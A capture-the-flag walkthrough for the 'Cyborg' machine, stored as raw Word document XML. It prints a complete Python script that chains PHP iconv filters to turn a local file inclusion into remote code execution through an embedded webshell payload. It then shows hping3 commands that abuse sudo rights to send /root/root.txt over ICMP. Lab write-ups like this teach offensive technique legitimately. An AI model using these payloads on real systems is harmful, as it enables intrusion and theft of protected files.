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CYBORG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eo8fuay96vbl"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navigate through the website, we can notice a page inclusion behavior through the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5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Given this page inclusion behavior, we can attempt to abuse a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vulnerability using the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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol.</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to read some relevant files and trying to include a remote file, we were unsuccessful. Apparently, the PHP directive </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is disabled.</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some research, we found something interesting: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI2RCE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hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d</w:t>
        </w:r>
      </w:hyperlink>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PHP filters to generate arbitrary output content.</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Basically, this means we can generate arbitrary PHP code for inclusion without having to write it to a file. For this, we can use the script below:</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url = "http://localhost/index.php"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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file_to_use = "/etc/passwd"</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command = "/readflag"</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#&lt;?=`$_GET[0]`;;?&gt;</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base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"</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conversions = {</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 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',</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 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',</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 'convert.iconv.UTF8.CSISO2022KR',</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'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',</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'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',</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 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',</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 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',</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'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',</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 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',</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 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',</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 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',</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 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',</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 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',</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 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',</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 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',</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 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',</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'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',</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'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'</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filters = "convert.iconv.UTF8.CSISO2022KR|"</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filters += "convert.base64-encode|"</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filters += "convert.iconv.UTF8.UTF7|"</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c in base64_payload[::-1]:</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filters += conversions[c] + "|"</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filters += "convert.base64-decode|"</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filters += "convert.base64-encode|"</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filters += "convert.iconv.UTF8.UTF7|"</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filters += "convert.base64-decode"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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final_payload = f"php://filter/{filters}/resource={file_to_use}"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requests.get(url, params={</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 command,</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"action": "include",</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 final_payload</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print(r.text)</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Basically, the purpose of the script is to generate a Base64 string at the beginning of the file that will finally be decoded, providing the desired payload that will be interpreted by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">include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make some modifications to the script. I will change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to be executed.</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96900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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will remove the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">action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and change the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to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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as shown below:</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571500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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this, we can execute the script, and shortly after we receive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62000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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obtain a reverse shell:</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52500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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5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script, we receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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160uq804gl7"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308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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jlgsizuai313" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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ey8zke3oseig" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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jg9uak73ukpm" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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5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17600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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the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directory, we can find our first flag.</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5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50sqxuhudir" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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notice that we have permission to execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/hping3 --icmp * </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with root privileges without needing to provide the password.</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5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take advantage of these permissions to read the final flag located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>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can open another shell and execute the following command:</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/usr/sbin/hping3 --icmp 127.0.0.1 --listen signature --safe</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92200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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other shell, execute the command below:</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/usr/sbin/hping3 --icmp 127.0.0.1 -d 100 -c 2 --sign signature --file /root/root.txt</w:t>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4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above, we receive the final flag in the other shell.</w:t>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5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0" name="image5.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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1"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Cyborg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30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.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8.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d" TargetMode="External"/><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NtE8ue04QrmyFxQZfDzTBKgIQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmVvOGZ1YXk5NnZibDIOaC5sMTYwdXE4MDRnbDcyDmguamxnc2l6dWFpMzEzMg5oLmV5OHprZTNvc2VpZzIOaC5qZzl1YWs3M3VrcG0yDmgucjUwc3F4dWh1ZGlyMg5oLjE3NWY1Y3M5NHowbzgAciExSWx6YzhHQmtpVmVYZ3RPTVpsbUFOTFV3UUVVU29wW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